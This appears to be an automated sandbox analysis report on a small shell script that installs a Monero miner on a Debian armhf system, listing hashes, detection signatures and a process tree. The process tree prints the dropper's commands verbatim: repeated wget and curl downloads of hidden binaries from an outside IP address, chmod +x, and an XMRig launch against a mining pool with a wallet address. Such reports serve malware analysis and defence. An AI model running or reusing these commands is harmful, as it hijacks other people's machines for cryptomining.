Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    21/10/2024, 01:53

General

  • Target

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh

  • Size

    700B

  • MD5

    c4d089011765cf8fa828d28b6eeeac3e

  • SHA1

    43d933e706b0eefd0db2b5acba19205ebc1af2bd

  • SHA256

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19

  • SHA512

    3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 26 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 16 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    1⤵
      PID:656
      • /usr/bin/wget
        wget 205.185.117.101/log2 -O /dev/null
        2⤵
          PID:657
        • /usr/bin/curl
          curl -L 205.185.117.101/log2 -o /dev/null
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          PID:677
        • /usr/bin/wget
          wget 205.185.117.101/__min__ -O /.__min__
          2⤵
            PID:684
          • /usr/bin/wget
            wget 205.185.117.101/__min__c -O /.__min__c
            2⤵
              PID:763
            • /usr/bin/wget
              wget 205.185.117.101/__min__m -O /.__min__m
              2⤵
                PID:764
              • /bin/chmod
                chmod +x /.__min__
                2⤵
                • File and Directory Permissions Modification
                PID:765
              • /bin/chmod
                chmod +x /.__min__c
                2⤵
                • File and Directory Permissions Modification
                PID:766
              • /bin/chmod
                chmod +x /.__min__m
                2⤵
                • File and Directory Permissions Modification
                PID:767
              • /usr/bin/nproc
                nproc --all
                2⤵
                • Enumerates kernel/hardware configuration
                PID:768
              • /bin/hostname
                hostname
                2⤵
                  PID:770
                • /.__min__c
                  /.__min__c
                  2⤵
                  • Executes dropped EXE
                  PID:771
                • /.__min__
                  /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
                  2⤵
                  • Executes dropped EXE
                  PID:773
                • /usr/bin/wget
                  wget 205.185.117.101/__min__c -O /.__min__c
                  2⤵
                    PID:776
                  • /usr/bin/wget
                    wget 205.185.117.101/__min__ -O /.__min__
                    2⤵
                      PID:777
                    • /usr/bin/wget
                      wget 205.185.117.101/__min__m -O /.__min__m
                      2⤵
                        PID:780
                      • /bin/chmod
                        chmod +x /.__min__
                        2⤵
                        • File and Directory Permissions Modification
                        PID:784
                      • /bin/hostname
                        hostname
                        2⤵
                          PID:785
                        • /.__min__
                          /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
                          2⤵
                          • Executes dropped EXE
                          PID:786
                        • /usr/bin/wget
                          wget 205.185.117.101/__min__ -O /.__min__
                          2⤵
                            PID:788
                          • /bin/chmod
                            chmod +x /.__min__c
                            2⤵
                            • File and Directory Permissions Modification
                            PID:791
                          • /bin/chmod
                            chmod +x /.__min__m
                            2⤵
                            • File and Directory Permissions Modification
                            PID:792
                          • /.__min__c
                            /.__min__c
                            2⤵
                            • Executes dropped EXE
                            PID:793
                          • /usr/bin/wget
                            wget 205.185.117.101/__min__c -O /.__min__c
                            2⤵
                              PID:795
                            • /usr/bin/wget
                              wget 205.185.117.101/__min__m -O /.__min__m
                              2⤵
                                PID:796
                              • /bin/chmod
                                chmod +x /.__min__c
                                2⤵
                                • File and Directory Permissions Modification
                                PID:799
                              • /bin/chmod
                                chmod +x /.__min__m
                                2⤵
                                • File and Directory Permissions Modification
                                PID:800
                              • /.__min__c
                                /.__min__c
                                2⤵
                                • Executes dropped EXE
                                PID:801
                              • /usr/bin/wget
                                wget 205.185.117.101/__min__c -O /.__min__c
                                2⤵
                                  PID:803
                                • /usr/bin/wget
                                  wget 205.185.117.101/__min__m -O /.__min__m
                                  2⤵
                                    PID:804
                                  • /bin/chmod
                                    chmod +x /.__min__
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:805
                                  • /bin/hostname
                                    hostname
                                    2⤵
                                      PID:806
                                    • /.__min__
                                      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
                                      2⤵
                                      • Executes dropped EXE
                                      PID:807
                                    • /usr/bin/wget
                                      wget 205.185.117.101/__min__ -O /.__min__
                                      2⤵
                                        PID:809
                                      • /bin/chmod
                                        chmod +x /.__min__c
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:812
                                      • /bin/chmod
                                        chmod +x /.__min__m
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:813
                                      • /.__min__c
                                        /.__min__c
                                        2⤵
                                        • Executes dropped EXE
                                        PID:814
                                      • /usr/bin/wget
                                        wget 205.185.117.101/__min__c -O /.__min__c
                                        2⤵
                                          PID:816
                                        • /usr/bin/wget
                                          wget 205.185.117.101/__min__m -O /.__min__m
                                          2⤵
                                            PID:817
                                          • /bin/chmod
                                            chmod +x /.__min__c
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:820
                                          • /bin/chmod
                                            chmod +x /.__min__m
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:821
                                          • /.__min__c
                                            /.__min__c
                                            2⤵
                                            • Executes dropped EXE
                                            PID:822
                                          • /usr/bin/wget
                                            wget 205.185.117.101/__min__c -O /.__min__c
                                            2⤵
                                              PID:824
                                            • /bin/chmod
                                              chmod +x /.__min__
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:825
                                            • /bin/hostname
                                              hostname
                                              2⤵
                                                PID:826
                                              • /.__min__
                                                /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
                                                2⤵
                                                • Executes dropped EXE
                                                PID:827
                                              • /usr/bin/wget
                                                wget 205.185.117.101/__min__ -O /.__min__
                                                2⤵
                                                  PID:829
                                                • /usr/bin/wget
                                                  wget 205.185.117.101/__min__m -O /.__min__m
                                                  2⤵
                                                    PID:831
                                                  • /bin/chmod
                                                    chmod +x /.__min__c
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:833
                                                  • /bin/chmod
                                                    chmod +x /.__min__m
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:834
                                                  • /.__min__c
                                                    /.__min__c
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:835
                                                  • /usr/bin/wget
                                                    wget 205.185.117.101/__min__c -O /.__min__c
                                                    2⤵
                                                      PID:837
                                                    • /usr/bin/wget
                                                      wget 205.185.117.101/__min__m -O /.__min__m
                                                      2⤵
                                                        PID:838
                                                      • /bin/chmod
                                                        chmod +x /.__min__c
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:841
                                                      • /bin/chmod
                                                        chmod +x /.__min__m
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:842
                                                      • /.__min__c
                                                        /.__min__c
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:843
                                                      • /usr/bin/wget
                                                        wget 205.185.117.101/__min__c -O /.__min__c
                                                        2⤵
                                                          PID:845
                                                        • /usr/bin/wget
                                                          wget 205.185.117.101/__min__m -O /.__min__m
                                                          2⤵
                                                            PID:846
                                                          • /bin/chmod
                                                            chmod +x /.__min__c
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:849
                                                          • /bin/chmod
                                                            chmod +x /.__min__m
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:850
                                                          • /.__min__c
                                                            /.__min__c
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:851
                                                          • /usr/bin/wget
                                                            wget 205.185.117.101/__min__c -O /.__min__c
                                                            2⤵
                                                              PID:853
                                                            • /usr/bin/wget
                                                              wget 205.185.117.101/__min__m -O /.__min__m
                                                              2⤵
                                                                PID:854
                                                              • /bin/chmod
                                                                chmod +x /.__min__
                                                                2⤵
                                                                • File and Directory Permissions Modification
                                                                PID:859
                                                              • /bin/hostname
                                                                hostname
                                                                2⤵
                                                                  PID:860
                                                                • /.__min__
                                                                  /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:861
                                                                • /usr/bin/wget
                                                                  wget 205.185.117.101/__min__ -O /.__min__
                                                                  2⤵
                                                                    PID:863
                                                                  • /bin/chmod
                                                                    chmod +x /.__min__c
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:864
                                                                  • /bin/chmod
                                                                    chmod +x /.__min__m
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:865
                                                                  • /.__min__c
                                                                    /.__min__c
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:866
                                                                  • /usr/bin/wget
                                                                    wget 205.185.117.101/__min__c -O /.__min__c
                                                                    2⤵
                                                                      PID:868
                                                                    • /usr/bin/wget
                                                                      wget 205.185.117.101/__min__m -O /.__min__m
                                                                      2⤵
                                                                        PID:869
                                                                      • /bin/chmod
                                                                        chmod +x /.__min__c
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:874
                                                                      • /bin/chmod
                                                                        chmod +x /.__min__m
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:875
                                                                      • /.__min__c
                                                                        /.__min__c
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:876
                                                                      • /usr/bin/wget
                                                                        wget 205.185.117.101/__min__c -O /.__min__c
                                                                        2⤵
                                                                          PID:878
                                                                        • /bin/chmod
                                                                          chmod +x /.__min__
                                                                          2⤵
                                                                          • File and Directory Permissions Modification
                                                                          PID:879
                                                                        • /bin/hostname
                                                                          hostname
                                                                          2⤵
                                                                            PID:880
                                                                          • /.__min__
                                                                            /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:881
                                                                          • /usr/bin/wget
                                                                            wget 205.185.117.101/__min__ -O /.__min__
                                                                            2⤵
                                                                              PID:883
                                                                            • /usr/bin/wget
                                                                              wget 205.185.117.101/__min__m -O /.__min__m
                                                                              2⤵
                                                                                PID:884

                                                                            Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • /.__min__

                                                                                    Filesize

                                                                                    8.2MB

                                                                                    MD5

                                                                                    8f96e8b4e9d26884c776c1b42a70bae5

                                                                                    SHA1

                                                                                    53a4166052211abf77e1edf0d71c7a6faae12cc5

                                                                                    SHA256

                                                                                    5e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4

                                                                                    SHA512

                                                                                    4709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec

                                                                                  • /.__min__c

                                                                                    Filesize

                                                                                    1.6MB

                                                                                    MD5

                                                                                    d3e378df1f5f920faaf9ef9e14a54f55

                                                                                    SHA1

                                                                                    b039ff3865762819392cec53eeac7c8ee0a630c3

                                                                                    SHA256

                                                                                    58fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29

                                                                                    SHA512

                                                                                    40ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358

                                                                                  • /.__min__m

                                                                                    Filesize

                                                                                    2.9MB

                                                                                    MD5

                                                                                    d98aa7684a42d8197b0eb2946c6d4fab

                                                                                    SHA1

                                                                                    a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da

                                                                                    SHA256

                                                                                    bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e

                                                                                    SHA512

                                                                                    e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee